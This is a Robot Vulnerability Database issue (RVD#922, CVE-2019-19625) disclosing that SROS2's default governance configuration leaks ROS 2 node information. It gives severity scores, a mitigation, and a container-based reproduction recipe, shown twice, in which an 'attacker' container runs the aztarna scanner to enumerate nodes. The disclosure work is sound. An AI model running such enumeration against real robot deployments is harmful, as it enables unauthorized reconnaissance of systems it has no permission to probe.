search

aliasrobotics / RVD

Robot Vulnerability Database. An archive of robot vulnerabilities and bugs.
https://aliasrobotics.com
GNU General Public License v3.0
168 stars 30 forks source link

RVD#922: SROS2 leaks node information #922

Open vmayoral opened 4 years ago

vmayoral commented 4 years ago 
cve: CVE-2019-19625
cwe: CWE-200 (Information Exposure)
description: We found that SROS 2, the tools to generate and distribute keys for ROS
  2 and use the underlying security plugins of DDS from ROS 2 leak node information
  due to a leaky default configuration as inidicated at https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13.
  This exposure was first raised in the Security Workshop of ROSCon 2019 (Nov. 2019).
  Further debugging the flaw indicates that there might be some additional underlying
  issues.
exploitation:
  description: A simple use of ros2cli allows to exploit this flaw. See https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
    for a walkthrough.
  exploitation-image: Not available
  exploitation-vector: Not available
  exploitation-recipe:
    networks:
      - network:
        - driver: overlay
        - name: net1
        - encryption: true
        - subnet: 12.0.0.0/24

      - network:
        - driver: overlay
        - name: net2
        - encryption: false
        - subnet: 13.0.0.0/24

    containers:
      - container:
        - name: subject1
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - network: net1
      - container:
        - name: subject2
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
             - network: net1
      - container:
        - name: attacker
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
             - network:
                - net1
                - net2

    flow:
      - container:
        - name: subject1
        - window:
            - name: unsecure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
        - select: unsecure
      - container:
        - name: subject2
        - window:
            - name: secure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
              - command: "ros2 run demo_nodes_cpp talker"
              - command: "export ROS_SECURITY_ENABLE=true"
              - command: "export ROS_SECURITY_STRATEGY=Enforce"
              - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
              - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
              - command: "env | grep ROS"  # from this point on, there's security enabled
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "cd /opt/ros2_ws/"
              - command: "mkdir policy"
              # generate a security policy based on our current graph
              - command: "ros2 security generate_policy policy/my_policy.xml"
              - command: "cat policy/my_policy.xml"
              #  populated the keystore for all profiles
              - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
              - command: "kill -9 $(pidof talker)"
        - select: secure
      - container:
        - name: attacker
        - window:
            - name: attacker_window
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "aztarna -t ros2 -d 0 --daemon -e"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - type: "aztarna -t ros2 -d 1 --daemon -e"
        - select: attacker_window
      - attach: subject2  
flaw:
  application: any ROS 2 node communicating
  architectural-location: platform code
  date-detected: null
  date-reported: '2019-12-06'
  detected-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  detected-by-method: runtime detection
  issue: https://github.com/aliasrobotics/RVD/issues/922
  languages: Python
  package: sros2
  phase: runtime-operation
  reported-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  reported-by-relationship: security researcher
  reproducibility: always
  reproduction: https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
  reproduction-image: Not available
  specificity: ROS-specific
  subsystem: cognition:middleware
  trace: N/A
id: 922
keywords:
- Robot Operating System 2
- ROS 2
- eloquent
- dashing
links:
- https://ros-swg.github.io/ROSCon19_Security_Workshop/
- https://github.com/ros-swg/turtlebot3_demo
- https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13
- https://design.ros2.org/articles/ros2_dds_security.html
- https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
mitigation:
  date-mitigation: null
  description: Modify the policy and set rtps_protection_kind to ENCRYPT
  pull-request: https://github.com/ros2/sros2/pull/171
severity:
  cvss-score: 7.5
  cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  rvss-score: 6.5
  rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:N/A:N/H:N
  severity-description: high
system: ros2
title: 'RVD#922: SROS2 leaks node information'
type: exposure
vendor: ''
vmayoral commented 4 years ago

Ticket updated, PR added.

vmayoral commented 4 years ago
alurity.yml file to reproduce sros2 leak ```yaml networks: - network: - driver: overlay - name: net1 - encryption: true - subnet: 12.0.0.0/24 - network: - driver: overlay - name: net2 - encryption: false - subnet: 13.0.0.0/24 containers: - container: - name: subject1 - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258 - network: net1 - container: - name: subject2 - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258 - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom - network: net1 - container: - name: attacker - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258 - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna - network: - net1 - net2 flow: - container: - name: subject1 - window: - name: unsecure - commands: - command: "source /opt/ros2_ws/install/setup.bash" - command: "export ROS_DOMAIN_ID=0" - command: "ros2 run demo_nodes_cpp talker" - split: horizontal - command: "source /opt/ros2_ws/install/setup.bash" - command: "export ROS_DOMAIN_ID=0" - command: "env | grep ROS" # this shows there's no security enabled at this point - select: unsecure - container: - name: subject2 - window: - name: secure - commands: - command: "source /opt/ros2_ws/install/setup.bash" - command: "export ROS_DOMAIN_ID=1" - command: "env | grep ROS" # this shows there's no security enabled at this point - command: "ros2 run demo_nodes_cpp talker" - command: "export ROS_SECURITY_ENABLE=true" - command: "export ROS_SECURITY_STRATEGY=Enforce" - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore" - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX" - command: "env | grep ROS" # from this point on, there's security enabled - command: "ros2 run demo_nodes_cpp talker" - split: horizontal - command: "source /opt/ros2_ws/install/setup.bash" - command: "export ROS_DOMAIN_ID=1" - command: "cd /opt/ros2_ws/" - command: "mkdir policy" # generate a security policy based on our current graph - command: "ros2 security generate_policy policy/my_policy.xml" - command: "cat policy/my_policy.xml" # populated the keystore for all profiles - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli" - command: "kill -9 $(pidof talker)" - select: secure - container: - name: attacker - window: - name: attacker_window - commands: - command: "source /opt/ros2_ws/install/setup.bash" - command: "aztarna -t ros2 -d 0 --daemon -e" - split: horizontal - command: "source /opt/ros2_ws/install/setup.bash" - type: "aztarna -t ros2 -d 1 --daemon -e" - select: attacker_window - attach: subject2 ```